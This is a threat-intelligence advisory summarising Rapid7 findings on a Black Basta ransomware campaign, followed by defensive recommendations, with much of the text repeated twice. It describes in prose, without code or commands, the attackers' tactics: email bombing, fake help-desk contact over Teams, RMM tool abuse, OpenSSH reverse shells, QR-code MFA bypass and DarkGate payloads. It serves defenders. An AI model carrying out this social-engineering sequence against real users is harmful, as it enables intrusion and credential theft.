Black Basta Ransomware Evolves with Email Bombing, QR Codes, and Social Engineering
Summary:
In early October 2024, Rapid7 witnessed a resurgence of activity related to an ongoing social engineering campaign being conducted by Black Basta ransomware operators. This activity was initially reported on by Rapid7 and has been ongoing since at least May 2024. Following the initial discovery, Rapid7 then uncovered an update in the tactics and payloads of the campaign that they derived from activity reported on in August 2024 that used Microsoft Teams for their lures. This new report elaborates on this campaign further, highlighting newly refined delivery methods, increased defense evasion capabilities, and new malware payloads.
The starting point of the attacks entails potential victims being email bombed by Black Basta operators. Following the email bomb, the adversary will reach out for initial contact with impacted users primarily via Microsoft Teams. The adversary will attempt to call or message the impacted user offering assistance while impersonating a member of the target organization’s help desk, support team, or IT staff, highlighting that these recent attacks are initiated similarly to previous activity attributed to this campaign. When the user interacts with the lure, the adversary will attempt to convince the user to execute a remote management (RMM) tool. Rapid7 has also observed attempts to leverage the OpenSSH client, a native Windows utility, to establish a reverse shell. In at least one instance, the threat actor shared a QR code with the targeted user, potentially attempting to bypass MFA after stealing user credentials. In a majority of cases, Rapid7 has observed that the operator, after gaining access to the user’s asset via RMM tool, will then attempt to download and execute additional malware payloads. The payload delivery methods vary per case but have included external compromised SharePoint instances, common file-sharing websites, servers rented through hosting providers, or even direct upload to the compromised asset in the case of RMM tool remote control. One of the most common first steps after gaining either the confidence of the user or remote access, is to execute a custom credential harvester. Following the execution of a credential harvester, an operator will typically infect the asset with Zbot or DarkGate. DarkGate can change its behavior if a known security product is detected. The DarkGate sample executed in this campaign contains 78 remote commands.
Analyst Comments:
Black Basta's evolving tactics highlight the importance of robust security awareness training and strong endpoint security. The group's ability to adapt and leverage legitimate tools like Microsoft Teams underscores the need for vigilant monitoring of unusual activity, especially when involving external users. The use of QR codes potentially for MFA bypass warrants further investigation into the intentions of these QR codes. Organizations should prioritize incident response planning and consider implementing advanced threat detection and response solutions to mitigate these threats. Baselining your environment for all installed remote monitoring and management solutions and utilizing application allowlisting solutions, such as AppLocker or Microsoft Defender Application Control to block all unapproved RMM solutions from executing within the environment is a potential security control that may strengthen an organization’s security posture. It is also recommended to ensure an organization’s users are aware of established IT channels and communication methods to identify and prevent common social engineering attacks.
Suggested Corrections:
IOCs are available here.
Rapid7 Recommendations for Limiting Exposure to These Types of Attacks
Backup your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.
Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.
Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?
Check Your Security Team's Work: Use a 3rd party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.
Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.
Train employees: Email remains the most vulnerable attack vector for organizations. Users should be trained on how to avoid and spot phishing emails. Multi-factor authentication can help prevent malicious access to sensitive services.
Link(s):
https://thehackernews.com/2024/12/black-basta-ransomware-evolves-with.html
https://www.rapid7.com/blog/post/20...paign-drops-zbot-darkgate-and-custom-malware/
https://www.rapid7.com/blog/post/2024/08/12/ongoing-social-engineering-campaign-refreshes-payloads/
https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/
In early October 2024, Rapid7 witnessed a resurgence of activity related to an ongoing social engineering campaign being conducted by Black Basta ransomware operators. This activity was initially reported on by Rapid7 and has been ongoing since at least May 2024. Following the initial discovery, Rapid7 then uncovered an update in the tactics and payloads of the campaign that they derived from activity reported on in August 2024 that used Microsoft Teams for their lures. This new report elaborates on this campaign further, highlighting newly refined delivery methods, increased defense evasion capabilities, and new malware payloads.
The starting point of the attacks entails potential victims being email bombed by Black Basta operators. Following the email bomb, the adversary will reach out for initial contact with impacted users primarily via Microsoft Teams. The adversary will attempt to call or message the impacted user offering assistance while impersonating a member of the target organization’s help desk, support team, or IT staff, highlighting that these recent attacks are initiated similarly to previous activity attributed to this campaign. When the user interacts with the lure, the adversary will attempt to convince the user to execute a remote management (RMM) tool. Rapid7 has also observed attempts to leverage the OpenSSH client, a native Windows utility, to establish a reverse shell. In at least one instance, the threat actor shared a QR code with the targeted user, potentially attempting to bypass MFA after stealing user credentials. In a majority of cases, Rapid7 has observed that the operator, after gaining access to the user’s asset via RMM tool, will then attempt to download and execute additional malware payloads. The payload delivery methods vary per case but have included external compromised SharePoint instances, common file-sharing websites, servers rented through hosting providers, or even direct upload to the compromised asset in the case of RMM tool remote control. One of the most common first steps after gaining either the confidence of the user or remote access, is to execute a custom credential harvester. Following the execution of a credential harvester, an operator will typically infect the asset with Zbot or DarkGate. DarkGate can change its behavior if a known security product is detected. The DarkGate sample executed in this campaign contains 78 remote commands.
Analyst Comments:
Black Basta's evolving tactics highlight the importance of robust security awareness training and strong endpoint security. The group's ability to adapt and leverage legitimate tools like Microsoft Teams underscores the need for vigilant monitoring of unusual activity, especially when involving external users. The use of QR codes potentially for MFA bypass warrants further investigation into the intentions of these QR codes. Organizations should prioritize incident response planning and consider implementing advanced threat detection and response solutions to mitigate these threats. Baselining your environment for all installed remote monitoring and management solutions and utilizing application allowlisting solutions, such as AppLocker or Microsoft Defender Application Control to block all unapproved RMM solutions from executing within the environment is a potential security control that may strengthen an organization’s security posture. It is also recommended to ensure an organization’s users are aware of established IT channels and communication methods to identify and prevent common social engineering attacks.
Suggested Corrections:
IOCs are available here.
Rapid7 Recommendations for Limiting Exposure to These Types of Attacks
- Restrict the ability for external users to contact users via Microsoft Teams to the greatest extent possible. This can be done for example by blocking all external domains or creating a white/black list. Microsoft Teams will allow all external requests by default. For more information, see this reference.
- Standardize remote management tools within the environment. For unapproved tools, block known hashes and domains to prevent usage. Hash blocking can be done, for example, via Windows AppLocker or an endpoint protection solution.
- Provide user awareness training regarding the social engineering campaign. Familiarize users with official help desk and support procedures to enable them to spot and report suspicious requests.
- Standardize VPN access. Traffic from known low cost VPN solutions should be blocked at a firewall level if there is no business use case.
Backup your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.
Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.
Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?
Check Your Security Team's Work: Use a 3rd party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.
Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.
Train employees: Email remains the most vulnerable attack vector for organizations. Users should be trained on how to avoid and spot phishing emails. Multi-factor authentication can help prevent malicious access to sensitive services.
Link(s):
https://thehackernews.com/2024/12/black-basta-ransomware-evolves-with.html
https://www.rapid7.com/blog/post/20...paign-drops-zbot-darkgate-and-custom-malware/
https://www.rapid7.com/blog/post/2024/08/12/ongoing-social-engineering-campaign-refreshes-payloads/
https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/